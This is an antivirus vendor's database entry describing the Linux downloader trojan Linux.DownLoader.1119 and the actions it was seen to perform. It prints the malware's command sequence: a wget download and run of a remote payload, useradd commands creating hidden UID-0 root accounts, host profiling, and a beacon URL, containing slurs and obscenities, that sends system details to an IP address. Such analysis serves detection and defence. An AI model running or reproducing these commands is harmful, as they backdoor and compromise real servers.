Linux.DownLoader.1119
Added to the Dr.Web virus database:
2019-06-14
Description added:
2019-06-14
Technical Information
Malicious functions:
Removes itself
Launches processes:
bash
wget -q http://thebestperlscripts.cf/.../os -O protections
chmod 777 protections
./protections
tr -d ./
clear
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash system
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash os
nscd -i passwd
nscd -i group
passwd system
passwd os
grep -Ew #Port|Port /etc/ssh/sshd_config
head -n1
awk {print $2}
lsb_release -d
awk {$1= \"\"; print $0}
nproc --all
free -mt
grep Total:
wget -qO- http://5.135.9.132/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=22&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS= Debian GNU/Linux 8.3 (jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse
Performs operations with the file system:
Modifies file access rights:
/root/protections
/etc/passwd+
/etc/shadow+
/etc/subuid+
/etc/subgid+
/etc/nshadow
Creates symlinks:
/etc/passwd.lock
/etc/group.lock
/etc/gshadow.lock
/etc/subuid.lock
/etc/subgid.lock
/etc/shadow.lock
Creates or modifies files:
/root/protections
/etc/.pwd.lock
/etc/passwd.720
/etc/group.720
/etc/gshadow.720
/etc/subuid.720
/etc/subgid.720
/etc/shadow.720
/etc/passwd-
/etc/passwd+
/etc/shadow-
/etc/shadow+
/etc/subuid-
/etc/subuid+
/etc/subgid-
/etc/subgid+
/etc/passwd.724
/etc/group.724
/etc/gshadow.724
/etc/subuid.724
/etc/subgid.724
/etc/shadow.724
/etc/nshadow
Deletes files:
/etc/passwd.720
/etc/group.720
/etc/gshadow.720
/etc/subuid.720
/etc/subgid.720
/etc/shadow.720
/etc/shadow.lock
/etc/passwd.lock
/etc/group.lock
/etc/gshadow.lock
/etc/subuid.lock
/etc/subgid.lock
/etc/passwd.724
/etc/group.724
/etc/gshadow.724
/etc/subuid.724
/etc/subgid.724
/etc/shadow.724
Network activity:
Establishes connection:
HTTP GET requests:
th#######rlscripts.cf/.../os
http://#.###.#.##########################.#####################HECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=%20Debian%20GNU/Linux%208.3%20(jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse
DNS ASK:
Other:
Collects CPU information
Collects RAM information